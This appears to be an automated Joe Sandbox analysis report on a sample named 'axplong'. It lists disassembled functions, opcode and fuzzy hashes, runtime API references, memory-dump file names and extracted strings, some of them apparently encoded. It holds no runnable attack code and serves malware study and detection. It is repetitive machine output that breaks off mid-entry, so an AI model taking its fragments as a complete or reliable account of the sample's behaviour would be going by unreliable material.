Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: b724f3c7a0a01b2488a4baaf9970fb72e8069f89307f20e7ba4ec0549a8ee404
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: F8518A7023C64A56DF388E3888967BE679A9F52300F1804AED4C2D7A82DB51DD74C761

Function 00264CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e732a4c5c11db6e0f1568f36b8086667a6fad47d995b2e1a14d1ee85571c4e6
Instruction ID: 2ae20414854b2502fa6e15125677f090b2c26e44e328441c6a1375f126fb4b69
Opcode Fuzzy Hash: 7e732a4c5c11db6e0f1568f36b8086667a6fad47d995b2e1a14d1ee85571c4e6
Instruction Fuzzy Hash: 1C225FB3F515144BDB4CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44

Function 002A6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6787ff46e30b4a77ea6e15d6c128871d4dff3179d69930b209e77e2ec0ddb0
Instruction ID: dc5699f81ed37ca22076de2f42d872a25b5248738ed1840410a023be5a6cfebe
Opcode Fuzzy Hash: 5d6787ff46e30b4a77ea6e15d6c128871d4dff3179d69930b209e77e2ec0ddb0
Instruction Fuzzy Hash: 19B17031224605DFD714CF28C886B657BE0FF46364F258658E8D9CF2A1CB75E9A1CB44

Function 00264AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49abd1154aa7f66506743a526788395b064de40fdd46706b038e9f4b6b60fa6e
Instruction ID: c420b35cf75ee9713ca7e194299079c3a80abc20ee6b1cf22838a1eca98eacce
Opcode Fuzzy Hash: 49abd1154aa7f66506743a526788395b064de40fdd46706b038e9f4b6b60fa6e
Instruction Fuzzy Hash: DE51B1706187D18FC319CF2D851563ABBE5AF95300F484A9EE0DA87292D774DA84CB92

Function 002A777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028e9ba5a7dfa204238625c5221f391da61adb7e497df2d55f80c9576fb19ee3
Instruction ID: 1ceb7502b68dd90f76642d5297faa17dcabb8db2d51a0feba012144f8a3fca5d
Opcode Fuzzy Hash: 028e9ba5a7dfa204238625c5221f391da61adb7e497df2d55f80c9576fb19ee3
Instruction Fuzzy Hash: 6721B673F204394B770CC47E8C5727DB6E1C68C641745423AE8A6EA2C1D96CD917E2E4

Function 002A765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca478f0211aec6be83fd45aac3cc98212318f7afd439f27c6a8750fcb31154f
Instruction ID: 981486c4f6ca66f03ab7e18383f16c629dc81e10943a18b05bd0b74b106b5850
Opcode Fuzzy Hash: bca478f0211aec6be83fd45aac3cc98212318f7afd439f27c6a8750fcb31154f
Instruction Fuzzy Hash: 3C118A23F30C255B675C817D8C172BAA5D6DBD825071F533AD826EB384E994DE23D290

Function 002A8720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 535c16cd2d5143197c668350b24ecfc2f77d0f3f6da48b6e4f4fd1dab8d68156
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BE11087F22014387D605CE2DCDF8AB6E796EAC7321B3C437AD1424B758DE229965D900

Function 0029645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ba09e9cd3efd587e154777c09df79afe7a69d64dee75d4b6efad36affb636c
Instruction ID: 9d434b46cd998e4c60d67a4c8bf5ec5718b4a7a798dca6a451de1f50cddd3cc5
Opcode Fuzzy Hash: 34ba09e9cd3efd587e154777c09df79afe7a69d64dee75d4b6efad36affb636c
Instruction Fuzzy Hash: 83E08C30152648ABDF35BF54DC08A483BAAEB11344F006410F8084A222CB35EDA2CD80

Function 0029A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 5053c50f94d750bb1c1e3c081c6c85a37f9d5706f0a9dd0de330138a34242646
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 00E04632921228EBCB15DB88890498AF2ACEB48B00F254096B505D3240C2B0DF00CBD0

Function 00272E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

Fz==, xrefs: 0027369E
HBhr, xrefs: 0027378F
8KG0fymoFx==, xrefs: 00272EC7
stoi argument out of range, xrefs: 00274269
invalid stoi argument, xrefs: 0027425A
246122658369, xrefs: 002733D4
WGt=, xrefs: 002733BA

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 7b54cf9842bf308dfac65ceb3abc93a7d850ecd0e10d9141b6071586837f6ee0
Instruction ID: 85ee1e85a73dabfce49091bf7bd600f51afad0f1cd0c7a95b9df2fb43279fc9b
Opcode Fuzzy Hash: 7b54cf9842bf308dfac65ceb3abc93a7d850ecd0e10d9141b6071586837f6ee0
Instruction Fuzzy Hash: B202E571920248DFEF14EFA8CC59BDE7BB5EF05304F508158E809A7282D7759A94CFA2

Function 00294770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002947A7
___except_validate_context_record.LIBVCRUNTIME ref: 002947AF
_ValidateLocalCookies.LIBCMT ref: 00294838
__IsNonwritableInCurrentImage.LIBCMT ref: 00294863
_ValidateLocalCookies.LIBCMT ref: 002948B8

Strings

csm, xrefs: 0029484D

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ed6938154476915e164bf283e34502dd0779a56e42119e0367b357ffa983619f
Instruction ID: 96b6b33ba1b88e962e006b60b2628b637a914b8bd690ac94fa840c97d2e0008b
Opcode Fuzzy Hash: ed6938154476915e164bf283e34502dd0779a56e42119e0367b357ffa983619f
Instruction Fuzzy Hash: 1351D730A202599BCF10EF68DC85EAE7BB5BF05318F148155E8189B352D772EE26CF90

Function 002970C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0029710B

Strings

.bat, xrefs: 0029713A
.exe, xrefs: 00297118
.com, xrefs: 0029714B
.cmd, xrefs: 00297129

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 1a33a2fb1b44e1e9a035e745f62922f48edbc7f076e30b0c44f88e751962f61c
Instruction ID: ed1f7ad0e04541055b4a9cc29d3d35b4770bbffb823c8360d2a746843a0b5635
Opcode Fuzzy Hash: 1a33a2fb1b44e1e9a035e745f62922f48edbc7f076e30b0c44f88e751962f61c
Instruction Fuzzy Hash: 6501C827638717276E196819AD0277B17989B83BB4B15002EF948F72C1DE44EC2245A0

Function 00262E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00262F1F
__Mtx_unlock.LIBCPMT ref: 00262F8C
__Cnd_broadcast.LIBCPMT ref: 00262FA3
__Mtx_unlock.LIBCPMT ref: 002630B5
__Mtx_unlock.LIBCPMT ref: 0026315B

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: b723bc084d9414813fbd53e01bb16f9380b81f8d4a465623de45e7418d86e848
Instruction ID: 971dba9e9cfaa69e05bd703cf11af34aca28655ee7209b92aefafd3a3f5607f6
Opcode Fuzzy Hash: b723bc084d9414813fbd53e01bb16f9380b81f8d4a465623de45e7418d86e848
Instruction Fuzzy Hash: 0FA1D0B0A206069FDB11DF74C944B6AB7B8FF15320F50816DE819D7681EB31EA68CB91

Function 00262670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00262806
___std_exception_destroy.LIBVCRUNTIME ref: 002628A0

Strings

P#&, xrefs: 002627BE, 00262899
P#&, xrefs: 00262811

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#&$P#&
API String ID: 2970364248-1581809584
Opcode ID: f6de4fac93cdde83d379a608c9ad7cd974b96e73c1bc949965314cd4eb294484
Instruction ID: 9e396ec5eec2db3313032e43a589479dfc2f52481bd194df459519ddc02a1553
Opcode Fuzzy Hash: f6de4fac93cdde83d379a608c9ad7cd974b96e73c1bc949965314cd4eb294484
Instruction Fuzzy Hash: C4718F71E10208DBDF05CFA8C885BDEFBB5EF59310F14812DE805A7285EB74A994CBA5

Function 00277870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0027795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00277968
__Mtx_destroy_in_situ.LIBCPMT ref: 00277971

Strings

@y', xrefs: 0027794A

Memory Dump Source

